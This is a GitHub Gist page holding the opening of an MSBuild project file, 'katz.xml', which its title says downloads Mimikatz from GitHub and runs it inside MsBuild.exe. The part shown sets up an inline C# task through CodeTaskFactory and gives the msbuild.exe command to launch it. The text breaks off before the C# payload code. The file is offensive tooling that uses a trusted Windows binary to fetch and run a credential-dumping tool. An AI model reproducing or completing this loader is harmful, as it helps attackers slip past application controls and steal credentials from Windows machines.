Skip to content

Instantly share code, notes, and snippets.

View expert4u-rahul's full-sized avatar

Rahul Choudhary expert4u-rahul

View GitHub Profile
@expert4u-rahul
expert4u-rahul / katz.xml
Created July 13, 2017 22:50
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"